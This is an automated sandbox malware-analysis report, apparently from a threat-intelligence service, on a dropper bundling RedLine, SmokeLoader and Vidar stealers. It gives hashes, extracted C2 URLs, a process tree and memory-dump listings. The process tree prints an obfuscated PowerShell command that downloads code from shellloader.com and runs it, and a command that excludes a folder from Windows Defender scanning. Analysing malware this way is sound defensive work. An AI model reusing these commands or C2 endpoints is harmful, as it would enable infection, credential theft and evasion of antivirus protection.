redline | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

Target

setup_x86_x64_install.exe
Size

2.2MB
MD5

e3b3a95ef03de0de77cca7a54ea22c94
SHA1

d318d234f8f27f25de660d9881113df9d11c24ff
SHA256

baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
SHA512

3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d

Score

10^/10

redline smokeloader vidar 706 aspackv2 backdoor infostealer stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.4

Botnet

706

https://romkaxarit.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2696	3032	rundll32.exe	8
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	3032	rundll32.exe	8

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral8/memory/4768-238-0x00000000014A0000-0x00000000014CE000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral8/memory/4228-275-0x0000000003E20000-0x0000000003EF3000-memory.dmp	family_vidar
behavioral8/memory/4228-311-0x0000000000400000-0x00000000021BE000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral8/files/0x000400000001ab17-123.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab17-125.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab16-124.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab16-129.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab16-130.dat	aspack_v212_v242
behavioral8/files/0x000500000001ab19-128.dat	aspack_v212_v242
behavioral8/files/0x000500000001ab19-131.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
2748	setup_installer.exe
3752	setup_install.exe
4192	Fri157e25afd971.exe
4204	Fri156ec98815f89c.exe
4216	Fri155442fc38b.exe
4228	Fri1544861ac3fe6a.exe
4356	Fri157e25afd971.tmp
4380	Fri15af75ee9b.exe
4388	Fri1553f0ee90.exe

Loads dropped DLL 6 IoCs

pid	Process
3752	setup_install.exe
3752	setup_install.exe
3752	setup_install.exe
3752	setup_install.exe
3752	setup_install.exe
3752	setup_install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 19 IoCs

pid	pid_target	Process	procid_target
4748	4228	WerFault.exe	97
4720	5076	WerFault.exe	108
5468	4228	WerFault.exe	97
5056	4228	WerFault.exe	97
5508	4228	WerFault.exe	97
6128	4160	WerFault.exe	110
4432	4228	WerFault.exe	97
5164	4160	WerFault.exe	110
4540	4228	WerFault.exe	97
6032	4160	WerFault.exe	110
5592	4228	WerFault.exe	97
4328	4160	WerFault.exe	110
5184	4160	WerFault.exe	110
6108	4228	WerFault.exe	97
4248	4160	WerFault.exe	110
5732	4160	WerFault.exe	110
4784	4228	WerFault.exe	97
5184	4228	WerFault.exe	97
5252	4228	WerFault.exe	97

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4388	Fri1553f0ee90.exe
Token: SeDebugPrivilege	4216	Fri155442fc38b.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 2256 wrote to memory of 2748	2256	setup_x86_x64_install.exe	82
PID 2256 wrote to memory of 2748	2256	setup_x86_x64_install.exe	82
PID 2256 wrote to memory of 2748	2256	setup_x86_x64_install.exe	82
PID 2748 wrote to memory of 3752	2748	setup_installer.exe	83
PID 2748 wrote to memory of 3752	2748	setup_installer.exe	83
PID 2748 wrote to memory of 3752	2748	setup_installer.exe	83
PID 3752 wrote to memory of 2228	3752	setup_install.exe	86
PID 3752 wrote to memory of 2228	3752	setup_install.exe	86
PID 3752 wrote to memory of 2228	3752	setup_install.exe	86
PID 3752 wrote to memory of 3788	3752	setup_install.exe	87
PID 3752 wrote to memory of 3788	3752	setup_install.exe	87
PID 3752 wrote to memory of 3788	3752	setup_install.exe	87
PID 3752 wrote to memory of 3200	3752	setup_install.exe	88
PID 3752 wrote to memory of 3200	3752	setup_install.exe	88
PID 3752 wrote to memory of 3200	3752	setup_install.exe	88
PID 3752 wrote to memory of 3932	3752	setup_install.exe	89
PID 3752 wrote to memory of 3932	3752	setup_install.exe	89
PID 3752 wrote to memory of 3932	3752	setup_install.exe	89
PID 3752 wrote to memory of 1540	3752	setup_install.exe	90
PID 3752 wrote to memory of 1540	3752	setup_install.exe	90
PID 3752 wrote to memory of 1540	3752	setup_install.exe	90
PID 3752 wrote to memory of 792	3752	setup_install.exe	91
PID 3752 wrote to memory of 792	3752	setup_install.exe	91
PID 3752 wrote to memory of 792	3752	setup_install.exe	91
PID 3752 wrote to memory of 4116	3752	setup_install.exe	94
PID 3752 wrote to memory of 4116	3752	setup_install.exe	94
PID 3752 wrote to memory of 4116	3752	setup_install.exe	94
PID 2228 wrote to memory of 4128	2228	cmd.exe	93
PID 2228 wrote to memory of 4128	2228	cmd.exe	93
PID 2228 wrote to memory of 4128	2228	cmd.exe	93
PID 3752 wrote to memory of 4144	3752	setup_install.exe	92
PID 3752 wrote to memory of 4144	3752	setup_install.exe	92
PID 3752 wrote to memory of 4144	3752	setup_install.exe	92
PID 3932 wrote to memory of 4192	3932	cmd.exe	95
PID 3932 wrote to memory of 4192	3932	cmd.exe	95
PID 3932 wrote to memory of 4192	3932	cmd.exe	95
PID 3200 wrote to memory of 4204	3200	cmd.exe	96
PID 3200 wrote to memory of 4204	3200	cmd.exe	96
PID 3200 wrote to memory of 4204	3200	cmd.exe	96
PID 1540 wrote to memory of 4216	1540	cmd.exe	98
PID 1540 wrote to memory of 4216	1540	cmd.exe	98
PID 3788 wrote to memory of 4228	3788	cmd.exe	97
PID 3788 wrote to memory of 4228	3788	cmd.exe	97
PID 3788 wrote to memory of 4228	3788	cmd.exe	97
PID 4192 wrote to memory of 4356	4192	Fri157e25afd971.exe	99
PID 4192 wrote to memory of 4356	4192	Fri157e25afd971.exe	99
PID 4192 wrote to memory of 4356	4192	Fri157e25afd971.exe	99
PID 792 wrote to memory of 4380	792	cmd.exe	101
PID 792 wrote to memory of 4380	792	cmd.exe	101
PID 792 wrote to memory of 4380	792	cmd.exe	101
PID 4144 wrote to memory of 4388	4144	cmd.exe	100
PID 4144 wrote to memory of 4388	4144	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2228
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:4128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3788
    - - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri1544861ac3fe6a.exe
        
        Fri1544861ac3fe6a.exe
        5⤵
        Executes dropped EXE
        
        PID:4228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 764
        6⤵
        Program crash
        
        PID:4748
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 800
        6⤵
        Program crash
        
        PID:5468
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 788
        6⤵
        Program crash
        
        PID:5056
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 832
        6⤵
        Program crash
        
        PID:5508
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 960
        6⤵
        Program crash
        
        PID:4432
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 988
        6⤵
        Program crash
        
        PID:4540
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1020
        6⤵
        Program crash
        
        PID:5592
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1424
        6⤵
        Program crash
        
        PID:6108
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1396
        6⤵
        Program crash
        
        PID:4784
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1612
        6⤵
        Program crash
        
        PID:5184
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1440
        6⤵
        Program crash
        
        PID:5252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3200
    - - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri156ec98815f89c.exe
        
        Fri156ec98815f89c.exe
        5⤵
        Executes dropped EXE
        
        PID:4204
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3932
    - - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri157e25afd971.exe
        
        Fri157e25afd971.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4192
      - C:\Users\Admin\AppData\Local\Temp\is-A3AA8.tmp\Fri157e25afd971.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-A3AA8.tmp\Fri157e25afd971.tmp" /SL5="$50050,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri157e25afd971.exe"
        6⤵
        Executes dropped EXE
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\is-LSATL.tmp\zab2our.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LSATL.tmp\zab2our.exe" /S /UID=burnerch2
        7⤵
        
        PID:4724
        
        C:\Program Files\Mozilla Firefox\MKHZYIARBF\ultramediaburner.exe
        
        "C:\Program Files\Mozilla Firefox\MKHZYIARBF\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\is-CF07B.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CF07B.tmp\ultramediaburner.tmp" /SL5="$301E4,281924,62464,C:\Program Files\Mozilla Firefox\MKHZYIARBF\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:6016
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\00-f6420-1e7-c0180-2f99953b5b1e9\ZHutehipyce.exe
        
        "C:\Users\Admin\AppData\Local\Temp\00-f6420-1e7-c0180-2f99953b5b1e9\ZHutehipyce.exe"
        8⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\69-a3ddb-02d-ac68f-2e934c3c888fd\Qucetaepatae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\69-a3ddb-02d-ac68f-2e934c3c888fd\Qucetaepatae.exe"
        8⤵
        
        PID:5968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri155442fc38b.exe
        
        Fri155442fc38b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4216
      - C:\Users\Admin\AppData\Roaming\5469306.exe
        
        "C:\Users\Admin\AppData\Roaming\5469306.exe"
        6⤵
        
        PID:4624
      - C:\Users\Admin\AppData\Roaming\2293519.exe
        
        "C:\Users\Admin\AppData\Roaming\2293519.exe"
        6⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:4308
      - C:\Users\Admin\AppData\Roaming\8705625.exe
        
        "C:\Users\Admin\AppData\Roaming\8705625.exe"
        6⤵
        
        PID:4768
      - C:\Users\Admin\AppData\Roaming\8601841.exe
        
        "C:\Users\Admin\AppData\Roaming\8601841.exe"
        6⤵
        
        PID:4492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:792
    - - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri15af75ee9b.exe
        
        Fri15af75ee9b.exe
        5⤵
        Executes dropped EXE
        
        PID:4380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4144
    - - C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri1553f0ee90.exe
        
        Fri1553f0ee90.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4388
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Roaming\7581388.exe
        
        "C:\Users\Admin\AppData\Roaming\7581388.exe"
        8⤵
        
        PID:4392
        
        C:\Users\Admin\AppData\Roaming\8724782.exe
        
        "C:\Users\Admin\AppData\Roaming\8724782.exe"
        8⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Roaming\6857957.exe
        
        "C:\Users\Admin\AppData\Roaming\6857957.exe"
        8⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\3324617.exe
        
        "C:\Users\Admin\AppData\Roaming\3324617.exe"
        8⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Roaming\3830901.exe
        
        "C:\Users\Admin\AppData\Roaming\3830901.exe"
        8⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        
        PID:5076
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5076 -s 1568
        8⤵
        Program crash
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 188
        8⤵
        Program crash
        
        PID:6128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 832
        8⤵
        Program crash
        
        PID:5164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 880
        8⤵
        Program crash
        
        PID:6032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 900
        8⤵
        Program crash
        
        PID:4328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1000
        8⤵
        Program crash
        
        PID:5184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1004
        8⤵
        Program crash
        
        PID:4248
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1100
        8⤵
        Program crash
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
        7⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\is-926JJ.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-926JJ.tmp\setup_2.tmp" /SL5="$10204,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\is-36AQT.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-36AQT.tmp\setup_2.tmp" /SL5="$20218,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\is-I4PUU.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-I4PUU.tmp\postback.exe" ss1
        11⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        13⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        14⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:5224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME7.exe
      4⤵
      PID:4116

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2696
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5448

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4984
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/692-349-0x000001EFB3540000-0x000001EFB358D000-memory.dmp

Filesize
308KB

Download
memory/692-341-0x000001EFB3600000-0x000001EFB3674000-memory.dmp

Filesize
464KB

Download
memory/884-380-0x00000162342D0000-0x0000016234344000-memory.dmp

Filesize
464KB

Download
memory/984-370-0x00000225D1740000-0x00000225D17B4000-memory.dmp

Filesize
464KB

Download
memory/1104-378-0x0000020FF7870000-0x0000020FF78E4000-memory.dmp

Filesize
464KB

Download
memory/1136-373-0x0000019E10E20000-0x0000019E10E94000-memory.dmp

Filesize
464KB

Download
memory/1164-317-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1360-379-0x000002ACC65A0000-0x000002ACC6614000-memory.dmp

Filesize
464KB

Download
memory/1376-382-0x0000027B55B80000-0x0000027B55BF4000-memory.dmp

Filesize
464KB

Download
memory/1848-384-0x0000013CD8340000-0x0000013CD83B4000-memory.dmp

Filesize
464KB

Download
memory/2120-401-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/2344-372-0x000002ACA7800000-0x000002ACA7874000-memory.dmp

Filesize
464KB

Download
memory/2384-375-0x0000023534470000-0x00000235344E4000-memory.dmp

Filesize
464KB

Download
memory/2556-350-0x000001CB8D000000-0x000001CB8D074000-memory.dmp

Filesize
464KB

Download
memory/2624-385-0x0000022DBD300000-0x0000022DBD374000-memory.dmp

Filesize
464KB

Download
memory/2636-396-0x000001EB0AF60000-0x000001EB0AFD4000-memory.dmp

Filesize
464KB

Download
memory/2672-412-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/3036-339-0x00000000028A0000-0x00000000028B5000-memory.dmp

Filesize
84KB

Download
memory/3752-145-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3752-151-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3752-153-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3752-149-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/3752-134-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/3752-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/3752-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/4128-201-0x0000000007550000-0x0000000007551000-memory.dmp

Filesize
4KB

Download
memory/4128-458-0x00000000047B3000-0x00000000047B4000-memory.dmp

Filesize
4KB

Download
memory/4128-206-0x00000000077D0000-0x00000000077D1000-memory.dmp

Filesize
4KB

Download
memory/4128-264-0x0000000008060000-0x0000000008061000-memory.dmp

Filesize
4KB

Download
memory/4128-208-0x0000000007840000-0x0000000007841000-memory.dmp

Filesize
4KB

Download
memory/4128-209-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

Filesize
4KB

Download
memory/4128-415-0x000000007EC10000-0x000000007EC11000-memory.dmp

Filesize
4KB

Download
memory/4128-179-0x00000000046C0000-0x00000000046C1000-memory.dmp

Filesize
4KB

Download
memory/4128-190-0x0000000006E30000-0x0000000006E31000-memory.dmp

Filesize
4KB

Download
memory/4128-184-0x00000000047B2000-0x00000000047B3000-memory.dmp

Filesize
4KB

Download
memory/4128-203-0x0000000007760000-0x0000000007761000-memory.dmp

Filesize
4KB

Download
memory/4128-182-0x00000000047B0000-0x00000000047B1000-memory.dmp

Filesize
4KB

Download
memory/4128-260-0x00000000075C0000-0x00000000075C1000-memory.dmp

Filesize
4KB

Download
memory/4128-180-0x0000000006EE0000-0x0000000006EE1000-memory.dmp

Filesize
4KB

Download
memory/4160-435-0x0000000002170000-0x00000000022BA000-memory.dmp

Filesize
1.3MB

Download
memory/4160-446-0x0000000000400000-0x0000000002167000-memory.dmp

Filesize
29.4MB

Download
memory/4192-176-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/4216-163-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/4216-183-0x000000001C330000-0x000000001C331000-memory.dmp

Filesize
4KB

Download
memory/4216-181-0x00000000008B0000-0x00000000008B2000-memory.dmp

Filesize
8KB

Download
memory/4216-171-0x0000000000880000-0x0000000000896000-memory.dmp

Filesize
88KB

Download
memory/4216-178-0x000000001B3E0000-0x000000001B3E1000-memory.dmp

Filesize
4KB

Download
memory/4228-275-0x0000000003E20000-0x0000000003EF3000-memory.dmp

Filesize
844KB

Download
memory/4228-311-0x0000000000400000-0x00000000021BE000-memory.dmp

Filesize
29.7MB

Download
memory/4308-296-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/4356-200-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4380-298-0x0000000000400000-0x0000000002152000-memory.dmp

Filesize
29.3MB

Download
memory/4380-280-0x0000000002160000-0x000000000220E000-memory.dmp

Filesize
696KB

Download
memory/4388-174-0x0000000000A60000-0x0000000000A61000-memory.dmp

Filesize
4KB

Download
memory/4388-177-0x000000001BFD0000-0x000000001BFD2000-memory.dmp

Filesize
8KB

Download
memory/4392-352-0x000000001B250000-0x000000001B252000-memory.dmp

Filesize
8KB

Download
memory/4432-277-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4492-279-0x00000000005A0000-0x00000000005A1000-memory.dmp

Filesize
4KB

Download
memory/4492-318-0x0000000004F20000-0x0000000004F21000-memory.dmp

Filesize
4KB

Download
memory/4612-191-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/4624-196-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/4624-239-0x000000001B040000-0x000000001B042000-memory.dmp

Filesize
8KB

Download
memory/4624-211-0x0000000000A40000-0x0000000000A7E000-memory.dmp

Filesize
248KB

Download
memory/4708-205-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/4708-210-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download
memory/4708-230-0x0000000004540000-0x0000000004541000-memory.dmp

Filesize
4KB

Download
memory/4708-227-0x0000000005170000-0x0000000005171000-memory.dmp

Filesize
4KB

Download
memory/4708-221-0x0000000004C80000-0x0000000004C81000-memory.dmp

Filesize
4KB

Download
memory/4708-218-0x0000000009460000-0x0000000009461000-memory.dmp

Filesize
4KB

Download
memory/4708-213-0x0000000002450000-0x000000000245C000-memory.dmp

Filesize
48KB

Download
memory/4724-307-0x0000000001260000-0x0000000001262000-memory.dmp

Filesize
8KB

Download
memory/4756-308-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/4768-257-0x0000000007F10000-0x0000000007F11000-memory.dmp

Filesize
4KB

